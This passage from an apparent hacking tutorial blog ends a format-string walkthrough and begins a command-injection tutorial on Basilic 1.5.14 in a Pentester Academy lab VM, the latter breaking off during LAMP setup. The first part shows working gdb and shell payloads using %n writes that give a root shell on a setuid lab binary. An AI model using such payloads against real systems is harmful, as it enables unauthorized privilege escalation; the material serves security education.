class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"8/span span class="o"=/span 0xf771/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"9/span span class="o"=/span 0xf76d/span span class="code-line"/code/pre/div /td/tr/table pAnd lastly to make the second number correct:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"10/span span class="o"=/span 0x1bffc/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"11/span span class="o"=/span 0x1bfff/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo we have our values right, let's run it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"process 956 is executing new program: /bin/bash/span/span span class="code-line"span class="gp"[email protected]:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pCool, we got a shell but as we are running it in gdb and gdb hasn't got the setuid bit set its not running and root, with this knowledge let try to get this to work outside of gdb:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pDidn't work, most likely our pointers aren't aligned again, so now to get them aligned:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%128\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"32212229443a204343/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%125\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"322122294449a5400/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63325u%125\$x : %51343u%126\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCCC :/span/span span class="code-line"span class="go"32212229448049a56/span/span span class="code-line"/code/pre/div /td/tr/table pThat looks ok, we added a 'C' so let's minus 1 from our padding and try:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63324u%125\$n : %51343u%126\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCCC :/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED! :-)/p pSo we've got root through a format string vulnerability./p pI just wanted to demonstrate the second format string vulnerability quickly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /spanln -s app %x/span span class="code-line"span class="gp"[email protected]:~$ ./%/spanx/span span class="code-line"span class="go"Usage: ./bffff654 lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is an interesting case, see if you can root it!/p h2Conclusion/h2 pInput that can be controlled by a user should never be trusted, this vulnerability could have been easily avoided by using the printf function with a static format string instead of passing user input as the first argument./p pThis was a very simple and obvious example of a format string vulnerability but they aren't always as easy to spot. I will likely write different examples in later tutorials./p pHappy Hacking :-)/p

Command Injection in Basilic

2 June 2014 at 13:53
By: 0xe7
pHere I will kick off my section on hacking web applications. This section will be more like the a href="/categories/reverse-engineering.html"reverse engineering/a section, and not like the a href="/categories/x86-32-linux.html"x86-32 linux/a or a href="/categories/linux-kernel-hacking.html"linux kernel hacking/a sections, in that it will not be laid out in a course format and will instead include single tutorials for certain applications or situations./p pThis tutorial will be regarding the first challenge in the codePentesting Challenges/code section of the a href="http://www.pentesteracademy.com" target="_blank"Pentester Academy/a website. It is a a href="https://www.virtualbox.org/" target="_blank"virtualbox/a a href="https://en.wikipedia.org/wiki/Virtual_machine" target="_blank"virtual machine/a labelled codeCommand Injection ISO/code. This virtual machine has been loaded with a number of web applications that are vulnerable to a href="https://www.owasp.org/index.php/Command_Injection" target="_blank"command injection/a./p !-- more -- h2The Vulnerable App/h2 pAfter booting the virtual machine and finding out its IP address, the first thing you do is browse to the IP:/p pimg src="/assets/images/web-hacking/basilic-first-browse.png" width="750" height="500"/p pAs we can see, there are a number of applications installed here. All of these are potential targets but for this tutorial we'll just concentrate on Basilic. As you can see, it is in code/basilic-1.5.14//code so we can assume the target version is 1.5.14./p pWe can check this by browsing to the basilic-1.5.14 directory and looking at the source of the page (the image below is the source of that page as shown in a href="http://portswigger.net/burp/" target="_blank"burpsuite/a):/p pimg src="/assets/images/web-hacking/basilic-first-source.png" width="750"/p pNow that we know the application and version number that we want to attack, we now need to set it up on a machine that we control (if this were a real attack, we wouldn't have control of the server which the web application is hosted on so we would download or buy the application and install it locally to pentest it)./p h2Setting Up The App/h2 pBrowsing to the a href="http://artis.imag.fr/Software/Basilic/" target="_blank"Basilic website/a, we can see that 1.5.14 is the latest version:/p pimg src="/assets/images/web-hacking/basilic-website.png" width="750" height="500"/p pAs my test server, I have installed a default version of a href="https://www.debian.org/" target="_blank"Debian/a 7 (Wheezy), ideally with a real attack we would try to make our development environment as close as possible to the production one, so we would try to figure out what version of a href="http://www.ubuntu.com/" target="_blank"Ubuntu/a, a href="http://www.php.net/manual/en/intro-whatis.php" target="_blank"PHP/a, a href="https://httpd.apache.org/" target="_blank"Apache/a and a href="https://www.mysql.com/" target="_blank"MySQL/a was running (as well as any other software involved) and set it up on those but as the goal is just to find a command injection vulnerability there is no need./p pFirst we need a href="https://en.wikipedia.org/wiki/LAMP_%28software_bundle%29" target="_blank"LAMP/a set up on there:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanapt-get install apache2 mysql-server php5 php5-mysql/span span class="code-line"span class="go"Reading package lists... Done/span/span span class="code-line"span class="go"Building dependency tree /span/span span class="code-line"span class="go"Reading state information... Done/span/span span class="code-line"span class="go"The following extra packages will be installed:/span/span span class="code-line"span class="go" apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common libaio1 libapache2-mod-php5 libapr1 libaprutil1/span/span span class="code-line"span class="go" libaprutil1-dbd-sqlite3 libaprutil1-ldap libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libonig2/span/span span class="code-line"span class="go" libplrpc-perl libqdbm14 mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 php5-cli php5-common ssl-cert/span/span span class="code-line"span class="go"Suggested packages:/span/span span class="code-line"span class="go" apache2-doc apache2-suexec apache2-suexec-custom php-pear libipc-sharedcache-perl libterm-readkey-perl tinyca openssl-blacklist/span/span span class="code-line"span class="go"The following NEW packages will be installed:/span/span span class="code-line"span class="go" apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common libaio1 libapache2-mod-php5 libapr1 libaprutil1/span/span span class="code-line"span class="go" libaprutil1-dbd-sqlite3 libaprutil1-ldap libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libonig2/span/span span class="code-line"span class="go" libplrpc-perl libqdbm14 mysql-client-5.5 mysql-server mysql-server-5.5 mysql-server-core-5.5 php5 php5-cli php5-common php5-mysql/span/span span class="code-line"span class="go" ssl-cert/span/span span class="code-line"span class="go"0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded./span/span span class="code-line"span class="go"Need to get 16.3 MB of archives./span/span span class="code-line"span class="go"After this operation, 118 MB of additional disk space will be used./span/span span class="code-line"span class="go"Do you want to continue [Y/n]? /span/span span class="code-line"span class="go"Get:1 http://ftp.uk.debian.org/debian/ wheezy/main libaio1 amd64 0.3.109-3 [9,150 B]/span/span span class="code-line"span class="go"Get:2 http://security.debian.org/ wheezy/updates/main mysql-client-5.5 amd64 5.5.37-0+wheezy1 [1,747 kB]/span/span span class="code-line"span class="go"Get:3 http://ftp.uk.debian.org/debian/ wheezy/main libnet-daemon-perl all 0.48-1 [46.2 kB]/span/span span class="code-line"span class="go"Get:4 http://ftp.uk.debian.org/debian/ wheezy/main libplrpc-perl all 0.2020-2 [36.0 kB]/span/span span class="code-line"span class="go"Get:5 http://ftp.uk.debian.org/debian/ wheezy/main libdbi-perl amd64 1.622-1 [898 kB]/span/span span class="code-line"span class="go"Get:6 http://security.debian.org/ wheezy/updates/main mysql-server-core-5.5 amd64 5.5.37-0+wheezy1 [3,387 kB]/span/span span class="code-line"span class="go"Get:7 http://ftp.uk.debian.org/debian/ wheezy/main libdbd-mysql-perl amd64 4.021-1+b1 [126 kB]/span/span span class="code-line"span class="go"Get:8 http://ftp.uk.debian.org/debian/ wheezy/main libonig2 amd64 5.9.1-1 [145 kB] /span/span span class="code-line"span class="go"Get:9 http://ftp.uk.debian.org/debian/ wheezy/main libqdbm14 amd64 1.8.78-2 [153 kB]/span/span span class="code-line"span class="go"Get:10 http://ftp.uk.debian.org/debian/ wheezy/main libapr1 amd64 1.4.6-3+deb7u1 [106 kB]/span/span span class="code-line"span class="go"Get:11 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1 amd64 1.4.1-3 [89.8 kB] /span/span span class="code-line"span class="go"Get:12 http://security.debian.org/ wheezy/updates/main mysql-server-5.5 amd64 5.5.37-0+wheezy1 [2,188 kB] /span/span span class="code-line"span class="go"Get:13 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1-dbd-sqlite3 amd64 1.4.1-3 [19.0 kB] /span/span span class="code-line"span class="go"Get:14 http://ftp.uk.debian.org/debian/ wheezy/main libaprutil1-ldap amd64 1.4.1-3 [16.6 kB] /span/span span class="code-line"span class="go"Get:15 http://ftp.uk.debian.org/debian/ wheezy/main apache2.2-bin amd64 2.2.22-13+deb7u1 [779 kB] /span/span span class="code-line"span class="go"Get:16 http://security.debian.org/ wheezy/updates/main php5-common amd64 5.4.4-14+deb7u10 [591 kB] /span/span span class="code-line"span class="go"Get:17 http://security.debian.org/ wheezy/updates/main php5-cli amd64 5.4.4-14+deb7u10 [2,559 kB] /span/span span class="code-line"span class="go"Get:18 http://ftp.uk.debian.org/debian/ wheezy/main apache2-utils amd64 2.2.22-13+deb7u1 [162 kB] /span/span span class="code-line"span class="go"Get:19 http://ftp.uk.debian.org/debian/ wheezy/main apache2.2-common amd64 2.2.22-13+deb7u1 [291 kB] /span/span span class="code-line"span class="go"Get:20 http://security.debian.org/ wheezy/updates/main libapache2-mod-php5 amd64 5.4.4-14+deb7u10 [2,669 kB] /span/span span class="code-line"span class="go"Get:21 http://ftp.uk.debian.org/debian/ wheezy/main apache2-mpm-prefork amd64 2.2.22-13+deb7u1 [2,368 B] /span/span span class="code-line"span class="go"Get:22 http://ftp.uk.debian.org/debian/ wheezy/main apache2 amd64 2.2.22-13+deb7u1 [1,444 B] /span/span span class="code-line"span class="go"Get:23 http://ftp.uk.debian.org/debian/ wheezy/main libhtml-template-perl all 2.91-1 [72.0 kB] /span/span span class="code-line"span class="go"Get:24 http://ftp.uk.debian.org/debian/ wheezy/main ssl-cert all 1.0.32 [19.5 kB] /span/span span class="code-line"span class="go"Get:25 http://security.debian.org/ wheezy/updates/main php5-mysql amd64 5.4.4-14+deb7u10 [80.9 kB] /span/span span class="code-line"span class="go"Get:26 http://security.debian.org/ wheezy/updates/main mysql-server all 5.5.37-0+wheezy1 [81.4 kB] /span/span span class="code-line"span class="go"Get:27 http://security.debian.org/ wheezy/updates/main php5 all 5.4.4-14+deb7u10 [1,026 B] /span/span span class="code-line"span class="go"Fetched 16.3 MB in 22s (733 kB/s) /span/span span class="code-line"span class="go"Preconfiguring packages .../span/span span class="code-line"span class="go"Selecting previously unselected package libaio1:amd64./span/span span class="code-line"span class="gp gp-VirtualEnv"(Reading database ... 27555 files and directories currently installed.)/span/span span class="code-line"span class="go"Unpacking libaio1:amd64 (from .../libaio1_0.3.109-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libnet-daemon-perl./span/span span class="code-line"span class="go"Unpacking libnet-daemon-perl (from .../libnet-daemon-perl_0.48-1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libplrpc-perl./span/span span class="code-line"span class="go"Unpacking libplrpc-perl (from .../libplrpc-perl_0.2020-2_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libdbi-perl./span/span span class="code-line"span class="go"Unpacking libdbi-perl (from .../libdbi-perl_1.622-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libdbd-mysql-perl./span/span span class="code-line"span class="go"Unpacking libdbd-mysql-perl (from .../libdbd-mysql-perl_4.021-1+b1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package mysql-client-5.5./span/span span class="code-line"span class="go"Unpacking mysql-client-5.5 (from .../mysql-client-5.5_5.5.37-0+wheezy1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package mysql-server-core-5.5./span/span span class="code-line"span class="go"Unpacking mysql-server-core-5.5 (from .../mysql-server-core-5.5_5.5.37-0+wheezy1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package mysql-server-5.5./span/span span class="code-line"span class="go"Unpacking 